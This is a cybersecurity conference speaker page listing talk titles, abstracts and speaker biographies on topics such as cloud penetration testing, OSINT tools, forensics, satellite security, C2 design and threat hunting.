HACKSPACECON'23 Speakers
On-Site (In-Person) | 1 Hour Talks
HSC'24 Conference Tickets on Sale Now
Speakers
The talks will be included in the general admission conference tickets. The talks are 1 hour each and will take place on April 12 from 8am - 5pm. The talk topics will focus on cybersecurity, AI, cloud, offensive, defensive, incident response, insider threats, space and aero defense.
Speakers, new tracks and talk updates will be released on social media leading up to the event.
Speakers Index
Carlos Polop
Dominic Cunningham
Cloud Pentest Apocalypse
Beau Bullock, Senior Security Analyst, Black Hills Security
Talk Description:
When the cloud pentest apocalypse comes, what vulnerabilities will have been exploited? With the emergence of cloud technologies many organizations have opted to move resources from on-prem to the cloud. Cloud environments present new and unique vulnerability possibilities. Without a solid understanding of the attack surface, a greater potential for misconfiguration arises. Cloud resources can be exposed publicly, access policies can be inconsistent, services get configured with hardcoded credentials, and more. This talk will help you doomsday prep by highlighting 10 of the most common issues we are finding on cloud penetration tests so you survive the coming apocalypse.
Speaker Bio:
Beau Bullock is a Senior Security Analyst and Penetration Tester and has been with Black Hills Information Security (BHIS) since 2014. Beau has a multitude of security certifications and maintains his extensive skills by routinely taking training, learning as much as he can from his peers, and researching topics that he lacks knowledge in. His favorite part of being at BHIS is having the opportunity to learn more, and the other amazingly talented people who work around him. He is a constant contributor to the infosec community by authoring open-source tools, writing blogs, speaking at conferences and on webcasts, and teaching his online class, Breaching the Cloud. Outside of his time at BHIS, Beau enjoys staying fit, gaming with his kids, playing guitar, and releasing music under the name NOBANDWIDTH.
Certifications:
OSCP: Offensive Security Certified Professional
OSWP: Offensive Security Wireless Professional
GXPN: GIAC Exploit Researcher and Advanced Penetration Tester
GPEN: GIAC Penetration Tester
GCIH: GIAC Certified Incident Handler
GCFA: GIAC Certified Forensic Analyst
GSEC: GIAC Security Essentials
GCIA: GIAC Certified Intrusion Analyst
GWAPT: GIAC Web Application Penetration Tester
BBOT (Bighuge BLS OSINT Tool) is an OSINT framework by hackers for hackers.
TheTechromancer, Hacker, Black Lantern Security
Talk Description:
This talk will tell the story of how we at Black Lantern Security got tired of the tedious process of running so many different tools, and set out to make OSINT fun again by creating one tool to rule them all.BBOT is written in Python. It is modular (with over 50 modules) and designed to automate the entire OSINT process and beyond -- from subdomain enumeration, to port scanning, to web screenshots, to vulnerability discovery, and more. There will be demos!
Speaker Bio:
TheTechromancer is a hacker at Black Lantern Security. When he's not pentesting, he enjoys writing hacking tools in Python, and speaking about them at conferences. He is an avid believer in open source software, and by the way he runs Arch Linux. He remains largely absent from the social media scene except on Github and ArtStation. He has some certifications, but asks that you judge him not by the color of his certs, but by the content of his Github profile. When provoked, he is likely to rant about Microsoft. Despite all these things he's actually a pretty friendly person.
The Power of Smartphone Forensics: Investigating an Extension of Ourselves
Katrina Khanta, Cyber Security Researcher
Talk Description:
Are you curious about Internet of Things (IoT) technology that we interact with everyday?-- let's examine smartphones! This conference talk is on smartphone forensics, showcasing the digital forensic research performed by Katrina after purchasing three previously used and wiped devices from a popular eCommerce website. Get ready for an insightful deep dive into the data extracted from the following devices, an Apple iPhone, a Samsung Galaxy, and a Google Pixel.
The talk will start with an overview of the importance of smartphone forensics in today's digital world and its role in investigations related to criminal and civil cases. Katrina will then delve into the technical details of data extraction and analysis, discussing the various challenges and limitations that come with the process. Throughout the talk, the speaker will showcase real-life examples of how smartphone forensics has been used to crack cases and uncover vital information. They will also discuss the ethical and legal considerations surrounding the use of smartphone forensics in investigations. By the end of the talk, attendees will have a better understanding of the power of smartphone forensics and its potential impact in solving crimes and bringing justice to victims.
Stick around after the presentation to ask additional questions, learn more about how to kick start your career in DFIR, and/or gain insight on leveraging your current skill sets to transition to a career in tech.
Speaker Bio:
Katrina Khanta is a cybersecurity industry professional and conference speaker who transitioned her career from combating human trafficking to bolstering cybersecurity at major organizations through Digital Forensics and Incident Response (DFIR). Katrina is an avid supporter of people who are in the process of transitioning their careers to a tech-related role. She aims to inspire and frequently encourages others by sharing resources that have helped her to succeed.
She is currently balancing her career in DFIR while being a full-time graduate student pursuing a Doctorate of Science (D.Sc.) in Cybersecurity at Marymount University. Having worked as a Protector of Magic at The Walt Disney Company, she became immersed in the fast-paced realm of broadcast systems engineering and technology, developing solutions to mitigate impact, and performing investigations on major incidents.
Katrina is a member of the Hack Red Con advisory board, bringing a well-rounded perspective and a commitment to fulfilling her endless curiosity to the community. #Curiosity&Coffee
Cyber Kill Chains in the Space Domain
Ronald Broberg, Penetration Test and Security Assessments - Currently focused on UAV Systems Dark Wolf Solutions
Talk Description:
1. Introduction to Cyber Kill Chains
2. Description of generic satellite system to include: ground systems (mission ops center, payload control center), comms system, and space system (flight control and payload control).
3. Scenario based intrusion mapped to CKC to include MOC intrusion, retrieval of comm keys, intrusion of comms to include access to flight controller, retrieval of PCC keys, access to payload controller and retrieval of payload data. Each step of the (simulated) intrusion will be accompanied by a video or live demonstration against emulated systems built with open source software.
4. Maturing cybersecurity in space domain
Speaker Bio:
Penetration Tester, Dark Wolf Solutions
Software Engineer Software Engineer Lockheed Martin- Software Development, Requirements Analysis, CyberSecurity Data Analysis, Penetration Testing
TBD - Threat Analysis 2023, CISA Tools
Klint Walker, Cybersecurity Advisor, Cybersecurity and Infrastructure Security Agency, U.S. DHS
Talk Description:
TBD
Speaker Bio:
Klint Walker is the Cyber Security Advisor for Region IV which covers Alabama, Florida, Georgia, Kentucky, Mississippi, North Carolina, South Carolina, and Tennessee. As the CSA, Klint is the liaison between Federal services and State, Local, territorial and Tribal Governments, Critical Infrastructure and Private Industry. He serves as the focal point for communications to promote Cyber Preparedness, incident response, risk mitigation and situational awareness. He provides direct coordination, outreach, and regional support in order to protect cyber components essential to the sustainability, preparedness, and protection of the Nation’s Critical Infrastructure and Key Resources (CIKR) and State, Local, Territorial, and Tribal (SLTT) governments Mr. Walker has previously held positions as an Information Systems Security Officer for the Department of Health and Human Services where he assisted in establishing the Computer Security Incident Response Center (CSIRC). Mr. Walker was also held the position of Chief Information Security Officer for the National Air and Space Intelligence Center (NASIC). In this role he was responsible for the operational resiliency of classified networks and facilities in adherence with DoD Standards and guidelines.
TBD Data and Privacy
Kelli Tarala, Founder, Owner, and Principal Researcher
Enclave Security and AuditScripts
SANS Instructor
Talk Description:
TBD
Speaker Bio:
An Open Letter to Infosec: Beaming your skill set to the next level
Charles Shirer, CEO Global Wave Consulting, Pentester, Senior RedTeamer
Talk Description:
TBD
Speaker Bio:
Charles Shirer: Bio: Charles has 20 years of overall Charles has done systems administration, penetration testing, development, Security Research ,Threat Hunting and Red Teaming. In his spare time Charles plays retro video games codes in the rust programming language and works on the SECBSD opensource project which is a penetration testing distro based on the OpenBsd Operating System, works on a podcast and has a passion for helping people.
Cracking the Cyber Security Job Code
Joe Brinkley, Director of Offensive Security Innovation, Research and Advanced Testing at OnDefend
Talk Description:
In this talk we will discuss an Introduction to Cyber Security, Recon for the job AKA Finding a Job in Cyber Security, Interviewing TIPS for a Cybersecurity Job, Initial Access aka Getting the Job, Escalation of Duties: AKA Getting Promotions, Long Term Persistence, a small guide on some investing ideas and making sure you don't work forever and more.
Speaker Bio:
Insightful, results driver IT professional with extensive knowledge of industry leading security standards and the use of latest and greatest IT security practices. Proven track record with 10 years of results leading to a successful track record. Comprehensive analytic skills; keen eye to details. Ability to plan, design, and implement security solutions for clients. Outstanding track record of identifying risks and managing disasters for a diverse set if clientele including private and federal contracts. Increased computer protection through new programs implemented from trained staff. Able to work in diverse surrounding; alone and in group settings. Ability to serve in both leadership and sub-ordinate roles. Excellent written and verbal communication skills. Able to build successful rapport with coworkers, employees, and clientele.
The Intelligence Value of Russian Data Dumps, Part 2
Wally Prather, Independent Intelligence Professional
Talk Description:
A talk designed to inform the attendees of the complexity, interconnections, and intelligence value of Russian data dumps (Part 2). This talk will show the data dumps individually and interpersonal connections between groups of individuals utilizing intelligence methodologies. Data dumps show us the inner workings, likes, dislikes, future plans, and internal conversations that were never meant to be public. Since HackRedCon Beta our communities understanding of Russian cyber, economic, military, government, media, and social dynamics has increased dramatically. From the beginning of the war in Ukraine a minimum of 3 TB of data was hacked from Russia; currently there are nearly 6 TB of new data. This talk will cover the newest data and previously unbriefed data dumps and their impressive intelligence value.
Speaker Bio:
Jon “Wally” Prather is a seasoned intelligence professional with a wide range of subject matter expertise and at the time of writing this independently researching intelligence related topics and currently pursuing new career options. Wally is proficient in multiple intelligence disciplines including HUMINT Targeting, HVI Targeteer, and Network Analysis with 20 years’ experience, primarily in maritime counterterrorism/ counterinsurgency operations with the US Marine Corps, Special Operations, and Irregular Warfare. Wally has operational experience providing in-depth intelligence analysis and direct support to combat and interagency operations in the Middle East, Southeast Asia, and Africa with over four years deployed to combat, hostile and sensitive environments to include East Africa, Afghanistan, and Iraq. Wally now applies intelligence processes and methodologies to cyber data with unique and innovative results.
Satellite Systems Hacking - Specific Topic TBD
Gregory Carpenter, Chief Security Officer at KnowledgeBridge International Inc.
Talk Description:
TBD
Speaker Bio:
Gregory Carpenter is Chief Security Officer of Knowledge Bridge International. He is a Fellow at the Royal Society for the Arts and was selected the National Security Agency’s Operations Officer of the Year in 2007. He serves on the Board of Directors for ATNA Systems, is a Senior Advisor for ARIC, Inc., and previously sat on the Board of Advisors for EC-Council University and the International Board of Advisors for the Mackenzie Institute. He is a retired military officer of 27 years and has held numerous senior positions in government and private business. Gregory holds a Bachelor of Science degree, a Master of Science degree, and a Doctorate in Public Health. He is a Certified Information Security Manager and ISO-9000 lead auditor.
Supply Chain Cybersecurity: What it is and Why it Matters
Colin Glover, Cyber Security Advisor. Cybersecurity Infrastructure
Security Agency, Department of Homeland Security
Talk Description:
From cell phones to cloud storage to satellite connectivity, the ICT supply chain encompasses the entire life cycle of hardware, software, and services and a diverse array of entities—including third-party vendors, suppliers, service providers, and end users. However, the globally distributed and interconnected nature of ICT also means that compromise of vulnerabilities in the supply chain can have cascading impacts across multiple critical infrastructure sectors. Through case studies and published methodologies, you will learn best practices for protecting your organization from supply chain attacks whether you are a developer, supplier or end user.
Speaker Bio:
Colin Glover pent the past 15 years working in the military and in the federal government on National Security matters. In August 2015, he completed his Master's Degree in Mechanical and Aerospace Engineering. He is seeking to transition to an engineering or data science position with the government or in industry.
Hack every team in your company: Learn to use an offensive security mindset to threat model business
David Girvin, Security Engineer
Talk Description:
We will do a deep dive into threat modeling from an offensive security point of view to show how diversity of thought can benefit every single team in a company. Hacking is not just for security anymore. An offensive mindset and strong threat modeling will show you weaknesses and strengths for every team, deal or plan your company is working on. Let’s look at why hackers who have moved to business have been so successful and why you should hire them.
Speaker Bio:
Commercial pilot and ship captain to owning a fabrication and industrial solutions company and some weird jobs in between. He learned a lot about people and problem solving. He came into tech in his mid thirties straight into security. He has a love for offensive security and social engineering. He is hoping to help change security culture on both ends, from the engineer to the board with a massive emphasis on servant leadership and raising up people around him.
TBD
Tyler Robinson, Managing Director of Offensive Security & Research at Trimarc
Talk Description:
TBD
Speaker Bio:
With over 2 decades of experience, Tyler Robinson- Founder of Dark Element specializes in Red Teaming, APT threat modeling, blackbox network penetration testing, and Physical/Social-Engineering.Tyler has presented at multiple conferences including BSides, DefCon and Blackhat panels, SANS security events and to multiple branches of the military. In Addition to helping teach the DarkSide-Ops and Accessing & Exploiting ICS class at Blackhat.Tyler has helped the development of a world class offensive security capability, strategy, and programs of Offensive services at several incredible companies such as Silent Break Security, InGuardians, Inc., Nisos, and now Trimarc, directly shaping Offensive operations and research. Currently, as Managing Director of Offensive Security & Research at Trimarc, Tyler leads a team of high performance security professionals within the offensive security field by simulating sophisticated adversaries, & creating scalable offensive security platforms using the latest techniques as seen in the wild.
Testing the Space Force: A look at modern targets in the DoD's newest branch
Tyler Fordham, Director, Penetration Testing and Cybersecurity
Talk Description:
Dark Wolf Solutions has had the opportunity to conduct a wide range of assessments against Space Force systems, many of which don't look much different than current you'd expect from modern commercial technology stacks! In this talk, Tyler will detail some of the broader implications of cybersecurity in the Space Force landscape, detail some of the work they've done and muse over where things will evolve from here.
Speaker Bio:
An Air Force veteran who's done everything from blue team operations for DoD cyber protection teams to OCONUS offensive security operations in the Middle East and the lead of Dark Wolf's penetration testing practice. Tyler's spent the last decade navigating the battle between intelligence, cyberspace and the countless branching factors that make it a hard space for our warfighters to solve. A nerd at heart like the rest of the folks in this industry, he might beat you in Smash Bros. or Pokémon when you aren't talking cyber.
Breakdown of a Cybercrime Take Down: "Diary of a Black Hat"
GhostExodus, Founder of Electronik Tribulation Army
Talk Description:
The aim of the talk is to offer a descriptive explanation of the many elements of an FBI takedown against a cyber criminal. Using the speaker's own experience as a former threat actor on the other side of the law, the speaker hopes to flesh out every step that transpires leading to a criminal conviction of a cybercrime, and how law enforcement accomplished this in their own case.
The topic cannot be discussed without an explanation on how cybercrimes are treated in a unique fashion and subject to antedated cybercrime laws which makes understanding or interpreting them difficult. This will include how information delegated by DOJ Press releases can be unwittingly misinterpreted and misrepresented by the media in a harmful way.
The speaker will also include their first-hand experiences in jail, and eventually prison, and how continuing the hacker's mindset gave them an advantage in a place without computer or internet access. After spending 11 years removed from the sociological and technological evolution taking place across the world, the speaker stepped out into a world they no longer recognized.
Speaker Bio:
GhostExodus is a former black hat computer hacker and insider threat. He is also the founder and leader of the hacking collective known as the Electronik Tribulation Army. In 2009, he was arrested for installing malicious code on healthcare systems. Upon conviction, he became the first person in recent US history to be convicted for corrupting industrial control systems and ultimately served nearly 11 years in federal prison.
As a two-time fugitive, GhostExodus attempted to flee the country. He broke into a US Customs-controlled shipyard and blackmailed the captain of a cargo ship into taking him to Nigeria after discovering that they were disabling their AIS tracking beacon while in international waters.
Currently, GhostExodus works as chief cybersecurity writer for ORNA, and freelances for BeIncrypto and Forklog Media. He uses his experiences as a former threat actor and hacker to bring awareness to security risks.
.NET – An APT’s Best Friend
Anthony "Coin" Rose
Jake "Hubble" Krasnov
Talk Description:
The .NET framework has become an increasingly popular choice among Advanced Persistent Threat
(APT) groups for developing and deploying malware. This talk will provide a comprehensive overview of
the current state of .NET usage by APTs, including a review of known APT campaigns utilizing .NET and a
deep dive into the analysis of common .NET-based tools and tactics employed by these groups. The
presentation will also cover the unique challenges posed by .NET-based APT attacks, including the ability to evade traditional security controls. Attendees of this talk will gain a deeper understanding of the .NET threat landscape, and will come away with the knowledge and tools needed to defend their organizations against .NET-based APT attacks.
Speaker Bios:
Anthony "Coin" Rose, CISSP, is a PhD Student at the Air Force Institute of Technology and Lead Security Researcher at BC Security, where he specializes in adversary tactic emulation planning, Red and Blue Team operations, and embedded systems security. He has presented at numerous security conferences,including Black Hat, DEF CON, HackMiami, and RSA conferences. Anthony is the author of various offensive security tools, including Empire and Starkiller, which he actively develops and maintains. He is recognized for his work, revealing wide-spread vulnerabilities in Bluetooth devices and is the co-author of a cybersecurity blog at https://www.bc-security.org/blog/.
Jake "Hubble" Krasnov is the Red Team Operations Lead and Chief Executive Officer of BC Security. He
has spent the first half of his career as an Astronautical Engineer overseeing rocket modifications for the Air Force. He then moved into offensive security, running operational cyber testing for fighter aircraft and operating on a red team. Jake has presented at DEF CON, where he taught courses on offensive PowerShell and has been recognized by Microsoft for his discovery of a vulnerability in AMSI. Jake has authored numerous tools, including Invoke-PrintDemon and Invoke-ZeroLogon, and is the co-author of a cybersecurity blog at https://www.bc-security.org/blog/.
C2 Connoisseuring: How to Turn Anything into a Masterful C2 System
Dahvid Schloss
Ross Flynn
Talk Description:
Are you tired of using the same old, tedious command and control systems? Wish you had something custom that wasn't completely fingerprinted by every AV/EDR in the book? Does this read like an infomercial where someone is trying to hold like 1000 Cheetos in their arms like some kind of maniac? You bet it does, so look no further!
In this talk, two cyber idiots will take you on a journey of turning mostly anything you want into a unique and potentially stealthy C2. From household items to cutting-edge technologies, you'll learn how to turn anything into a powerful C2 system that will leave your blue teams in the dark. We'll cover everything you need to know to become a C2 connoisseur, including:
-
Understanding the basics of command and control systems
-
How to identify potential C2 systems in everyday objects
-
Techniques for turning anything into a C2 system
-
Creative approaches to C2 design and implementation
-
Best practices for developing and deploying unconventional C2 systems
Whether you're a seasoned ethical hacker or just starting out come join these two idiots as they dispel the myth that you need to be 1337 to develop a good c2.
Speaker Bios:
Dahvid is the Managing Lead, Offensive Security at Echelon. As an experienced cybersecurity leader with over 12 years of cyber-attack and defense experience, Dahvid has previously worked as a Red Team Operator with a Big 4 consulting firm leading and conducting Adversarial Emulation (red team) exercises as well as served in the military, leading, conducting, and advising on special operations offensive cyber operations. He has a wide background in cybersecurity including logical, social, and physical exploitation as well as incident response and system/network device hardening. Dahvid is also a Malware Development Instructor, growing Adversarial Emulation knowledge to those looking to expand their skills in the highly specialized space.
Ross is a husband, musician, escape room expert, and hot sauce connoisseur who happens to love his job as a Cybersecurity consultant. Prior to his career in Infosec, Ross was a family preservation counselor in the social services field where he helped families involved in the Child Welfare system identify strengths, develop healthy boundaries, and ensure a safe environment for their children. After a major career switch, he started down the path of ethical hacking, risk management, and business continuity. On a normal day you might find Ross performing a penetration test, conducting an incident response tabletop exercise, writing disaster recovery plans, or performing NIST, PCI, or Maturity assessments.
Controlled Flight into Terrain: How [NOT] to Succeed at Cybersecurity Startups
Georgia Weidman
Talk Description:
Have you ever gotten off the plane at BlackHat or RSA and seen the security vendor ads lining the corridors? Or made your way through a crowded vendor hall with the multistory booths larger and more elaborate than a typical city apartment and thought to yourself, that could be me? Then this talk is for you. Are you ready to never work again and enter the privileged world of successful entrepreneurs permanently on vacation? Just kidding! Are you ready to work so hard any potential reward will come out to well below minimum wage when you calculate the hours, blood/sweat/tears, and mental health crises that went into it? Then maybe it is time to start a cybersecurity startup. In this talk we will take a dive into the exciting world of turning your hacking tool into a successful product company and how to avoid the common pitfalls encountered by the speaker and her merry band of startup world survivors. We will cover exciting topics such as venture capital funding, startup accelerators, and making your first sale. We will also discuss not as exciting but equally important topics as corporate structures, hiring a CEO, and board meetings. Filled with info and direct quotes from real security practitioners turned startup founders, venture capital investors, and serial expert advisors, this talk will get you ready to start down the path of your own startup journey, or run screaming in the other direction.
Speaker Bio:
Georgia Weidman is a serial entrepreneur, penetration tester, security researcher, speaker, trainer, and author. Georgia is the author of Penetration Testing: A Hands-On Introduction to Hacking and a contributor to Tribe of Hackers series which collectively have launched the cybersecurity careers of thousands. Her work in the field of smartphone exploitation has been featured internationally in print and on television including ABC, BBC, Fox, NBC, and PBS. She has presented and trained around the world including venues such as Black Hat, DEF CON, NSA, Oxford, RSA, and West Point and has served as a subject matter expert with the CyberWatch Center's National Visiting Committee, the FTC’s Home Inspector IoT security challenge, and as a New America Cybersecurity Policy Fellow.
Georgia founded Bulb Security LLC, a security consulting firm specializing in security assessments, penetration testing, security training, and research and development in mobile and IoT security. She was awarded a DARPA Cyber Fast Track grant to continue this work culminating in the release of the open-source project the Smartphone Pentest Framework. She founded Shevirah Inc. to create products for assessing and managing the risk of mobile and the Internet of Things and evaluating the effectiveness of mobile security solutions. Shevirah is a graduate of the Mach37 cybersecurity accelerator, and, through Mach37, Georgia has served as an advisor, mentor, and occasionally investor in the next generation of cybersecurity startups.
She received the 2015 Women’s Society of CyberJutsu Pentest Ninja award, is an Adjunct Professor at the University of Maryland Global Campus, and she holds a MS in computer science; U.S. Patents #10,432,656 and #11,089,044 which are foundational to simulated phishing; as well as CISSP, Pentest+, and OSCP certifications.
Harnessing the Power of Artificial Intelligence in AWS Pentesting
Mike Felch
Talk Description:
With the advancement in artificial intelligence, leveraging it's potential during penetration tests can lead to quickly identifying vulnerable attack paths. ChatGPT is an AI model developed by OpenAI, which is trained on massive datasets from the internet. It's capable of receiving input from users and then generating textual results based on the data it's been trained with. Luckily for us, it understands technology, tools, and code very well!
In this presentation, I will demonstrate how adaptive techniques can incorporate the use of ChatGPT while on AWS penetration tests. I will focus on the exploitation, lateral movement, and privilege escalation phases of an engagement to highlight how AI can be incorporated into pentesting tradecraft. Finally, I will open-source a new tool that leverages AI to quickly identify vulnerable attack paths against AWS.
Speaker Bio:
Mike Felch first joined Black Hills Information Security (BHIS) in August 2017. As a Security Researcher, his role is to identify and weaponize security vulnerabilities in emerging technologies. Mike started his career in 1997 as a Linux administrator, which led to numerous offensive security and engineering roles. He chose BHIS because of the value placed on team culture, and he enjoys being part of a company that has the opportunity to make a difference in major organizations worldwide. Outside of work, Mike operates a family ranch where he raises cattle, chickens, and goats.
Breaking into InfoSec
Gregory "mobman" Hanis
Talk Description:
Breaking into InfoSec - highlights of different roles in the industry and where they lead to. Skill sets and tools used. Knowledge and understanding of what is required. Answers the often heard “What languages should I learn over others? What certifications should I pursue? etc. Plus Q & A from the audience.
Speaker Bio:
Greg has been featured in the Rolling Stones, CBS Miami in various occasions, and DarkNet Diaries Episode:20. Active in the cyber community since his teenage years the 90’s, he sponsors and volunteers CyberPatriot as a way to help aspiring young cyber professionals avoid costly mistakes he knows all too well. He is a patent holder and former start-up entrepreneur nominated for the North Alabama's 2017 People's Choice awards for work in intrusion detection methods. Greg gives talks and trainings around the country sharing his knowledge with the public and private sectors. Former board member of SFISSA (South Florida Information Systems Security Association), he founded and co-leads HACKBAMA to encourage and cultivate local cyber talent. He has competed in many cyber competitions (CTF’s).
Info-sec specialist whose qualifications include a degree in computer science; detailed knowledge of security tools, technologies and best practices. Over Twenty years of experience in the creation and deployment of solutions protecting networks, systems and information assets for diverse companies and organizations.
Specialties: programming, database, risk management, wireless, networking, world wide web, operating system vulnerabilities, exploitation, forensics, and many more.
Trust, but verify.
David Hunt
Waseem Albaba
Talk Description:
Our defenses are very complex, spanning many technologies and resources in our network. Ideally, we understand the limitations of these defenses, but often they're black boxes we trust to protect us. How can we be sure they're working as intended? We do this by asking questions about our systems and defenses. And we do it continuously, on all our systems, even mission-critical production systems. With the gathered intelligence, we’re able to make decisions that will better harden our defenses.
In this talk, we'll introduce Verified Security Tests (VSTs), a more structured, scale-ready format of the TTP, that's designed for security testing at scale. We'll discuss how VSTs can be used for validating the efficacy of defensive technology, and we'll introduce tools to help practitioners develop and deploy VSTs.
Speaker Bios:
David Hunt is the Co-Founder and CTO of Prelude Research Inc. There, he leads a team supporting a cutting-edge autonomous red team platform. Prior to this work, David built CALDERA, an open-source adversary emulation framework, while working as a Principal Cyber Security Engineer for MITRE. David has spent 15 years working as a security consultant for the U.S. Government, along with full-time roles at major cyber security firms, such as FireEye.
Waseem Albaba is an Adversarial Security Engineer working at Prelude Security.... He is constantly seeking to expand his professional expertise of Penetration Testing, Red-Teaming, and Purple-Teaming. Waseem is also a passionate cat lover, skateboarder, and global traveler. Through both individual projects, competitive CTF, and work at Prelude he strives to deliver constant value to the information security community. Alongside that, he is determined to immerse himself in every part of cyberspace to improve himself while also supporting his close friends and coworkers along the way.Certifications:OSCP: Offensive Security Certified Professional, CBBH: Certified Bug Bounty Hunter, CompTIA:Security+
Hook, Line, & Cyber: A Fisherman’s Guide to Building a Security Operations Center
Nick Gipson, Founder/CEO, Gipson Cyber
Talk Description:
A robust Security Operations Center (SOC) is essential for protecting an organization from cyber threats. This paper presents a guide for building an effective SOC, using the metaphor of fishing to illustrate key concepts. The presentation discusses the importance of understanding the "ocean" of potential threats and having the right "gear" to catch those threats. It then explores the importance of having a "fishing net" or a well-defined incident response plan. The presentation also covers the importance of "reeling in" and analyzing data and the importance of "cleaning and storing" data for future reference. Finally, the presentation examines the importance of having a "skilled fisherman" or experienced security analyst and "sharing catches" or information sharing with other organizations. Overall, this presentation is intended to help organizations build an effective SOC that can secure them from cyber threats, just as a skilled fisherman can secure their catch.
Speaker Bio:
Nick Gipson is a highly experienced professional with over seven years in the fields of Security and Technology. Throughout his career, he has led forensics teams for the US Central Command as well as multiple private sector organizations. In addition, Nick has built a total of four Security Operations Centers (SOCs) for a variety of organizations, including US Cyber Command. Prior to that, Nick had a six-year career as an Army Reconnaissance Soldier.
Certs: GCFA, CISSP
Thrunting 101
Jason Killam
Talk Description:
We're gonna talk about the basics of "thrunting" otherwise known as threat hunting, or the process of searching for "unknown evil" that your existing alerts may be missing.
How does one thrunt? My talk will cover the steps necessary to conduct threat hunting, by going from hypothesis to searching and finishing with detection rules to find evil we might find along the way going forward.
Speaker Bio:
I'm a detection engineer for Red Canary, former SOC monkey at Jack Henry and Associates, and a Cyber Warfare Operator with the US Air Force, hunting for APTs. I love Lego, long walks on the beach in Illinois/Missouri, playing Halo, and looking at evil processes at my job detectin' evil.
https://redcanary.com/authors/jason-killam/
Make Private Public Sector Stuff Private Again
Janusz Jasinski
Talk Description:
What do festivals, concerts, hospitals and police stations all have in common? They all have places you should not be able to access. It could be backstage, a VIP area, an operating theatre or a mogue. Emphasis on the "should not".
We will focus on hospitals, showing what damage could be done with relative little effort and seeing what could be done to prevent it. This isn't a FTSE 100 company where the only commodity is money. These are peoples lives at risk.
Speaker Bio:
JJ was a developer in the UK for 20 years before joining Counter Hack as a senior technical engineer in February of this year. He mostly stayed in the public sector but also did work for live music promoters. This is where his curiosity got the better of him; opening doors, pressing buttons and flicking switches he had no business touching.
He loves breaking and fixing stuff but not necessarily in that order.
Privacy at Risk: The Dangers of PII/PHI in Rental/Lease Cars Left Behind
Chris "BLu3f0x" Huffstetler
Talk Description:
Employers sometimes offer leased or rental cars to their employees, providing them with a convenient means of transportation. However, these vehicles can also be equipped with radios that require the access of your phone that can gather personal identification information (PII) such as names, addresses, and credit card numbers, possibly health identification information (PHI)as well. Also drivers can easily leave unsecured hard copies of the same PII and PHI. This poses significant risks to the privacy of lease and rental car users, especially if the information is not removed when the lease period is over or the rental is returned. In this talk, we explore the ways in which PII and/or PHI can be exposed through lease and rental cars, the potential consequences of this exposure, and what steps that employers and users can take to protect their privacy.
Speaker Bio:
Chris "BLu3f0x" Huffstetler is a Cyber Security Consultant and Application Penetration Tester and has been with CGI Federal since December 2022. Chris has experience in network and communication security starting back in 1998 with North Carolina National Guard then transferred to active duty for 7 more years in the U.S. Army. Afterwards, Chris did several years in DoD and DoS contracting focused on network and radio communication security. After a brief period of exploring law enforcement, Chris then went to HackMiami where he was immersed into Cyber Security and since hasn't stopped learning and sharing by speaking at HackMiami, BSides Puerto Rico, and OWASP Tampa. When not at work, he helps out other non-profits organizations on cyber security events, build Legos sets and the occasional gaze at the stars using the telescope with his daughter.
Red Team 2.0: Adapting Traditional Red Team to Cloud (AWS) Red Team
Carlos Polop
Talk Description:
"Red Team 2.0: Adapting Traditional Red Team to Cloud (AWS) Red Team" is a talk focused on the evolution of Red Teaming and its adaptation to cloud computing, specifically Amazon Web Services (AWS). As organizations increasingly move their operations to the cloud and adopt architectures such as zero trust networks, the need for Red Teaming to address security challenges unique to the cloud has grown. This talk will explore the challenges that come with adapting traditional Red Teaming to a Cloud (AWS) environment, and provide insights on how to effectively conduct Red Teaming exercises in the cloud. Participants will learn about the key differences between traditional Red Teaming and AWS Red Teaming, and the unique considerations and tools that come with the latter. The talk will cover best practices and techniques for conducting AWS Red Team exercises, such as exploiting cloud misconfigurations, testing security measures, evaluating the effectiveness of cloud-based security systems by doing live demos and showing less known techniques to compromise, escalate privileges and post exploit an AWS environment. Attendees will leave the talk with a deep understanding of the importance of Red Teaming in the cloud environment, the specific challenges posed by AWS, and practical techniques and tools for conducting successful AWS Red Team exercises. This talk is ideal for security professionals, cloud engineers, and anyone interested in gaining a better understanding of Red Teaming in the cloud.
Speaker Bio:
Carlos has a degree in Telecommunications Engineering with a Master in Cybersecurity and is currently working as Team Leader of Web, Mobile & Cloud Penetration Testing at Halborn.
He also has several relevant certifications in the field of cybersecurity such as OSCP, OSWE, CRTP, eMAPT, eWPTXv2…
As CTF player, has won some international CTF competitions, he was captain of the Spanish national team in ECSC2021, and part of the winning European Team in the ICSC2022.
Since he started learning cybersecurity he has tried to share his knowledge with the infosec community by publishing open source tools such as https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite and writing free hacking books that anyone can consult at https://book.hacktricks.xyz/ and https://cloud.hacktricks.xyz/.
When Red Meets Blue: A Love-Hate Story of Cybersecurity
Dominic Cunningham
Talk Description:
In the world of cybersecurity, red teams are tasked with identifying vulnerabilities and potential threats to a company's security, while blue teams are responsible for defending against these attacks. While they may seem like natural adversaries, the reality is that these two teams can learn from each other. In this talk, we will explore the relationship between red and blue teams through the lens of a "love-hate" story. While red teams may be seen as the "bad guys" trying to break into the system, the truth is that they have a crucial role to play in identifying weaknesses that actual attackers could exploit. Similarly, blue teams may be seen as overbearing and inflexible, but they are responsible for implementing the necessary defenses to protect against these attacks.
While red teams are responsible for attacking and identifying vulnerabilities, blue teams defend against these attacks. However, a major challenge in this collaboration is the skill gap between the two teams. Red teams may have more knowledge of threat intelligence and tactics, techniques, and procedures (TTPs), while blue teams may have more expertise in defensive strategies and network operations. One way to bridge this gap is by sharing threat intelligence knowledge and domain-specific expertise. By understanding the TTPS used by real-world attackers and tooling, blue teams can better prepare and defend against potential threats. Additionally, knowledge of blue team methodology and patterns can benefit blue teams. This knowledge of both teams' methodology and shortcomings can aid in developing a better cybersecurity dynamic and strengthen skill gaps.
Speaker Bio:
Dominic "Cryillic" Cunningham, serves as a Red Team Content Engineer at TryHackMe and a Course Instructor at BC Security. He is currently pursuing a Computing Security degree at the Rochester Institute of Technology. Dominic specializes in general adversary emulation and offensive operations, with a focus on researching and documenting evasion techniques, Windows Internals, and active directory. He has delivered presentations and instruction at conferences such as Blackhat and DEF CON. Dominic's extensive research work has been featured on https://www.tryhackme.com, where he has also created and published numerous CTF boxes and enterprise-level ranges.
The Rebol Yell
Oscar Minks
Talk Description:
A deep dive into a real world observation that analyses how attackers are utilizing COTS applications for C2 functionality. The talk will deep dive into the kill-chain of this attack from initial target though payload delivery. We will also explore other persistence
mechanisms and lateral movement techniques. More importantly we will discuss how to defend and mitigate against such attacks.
Speaker Bio:
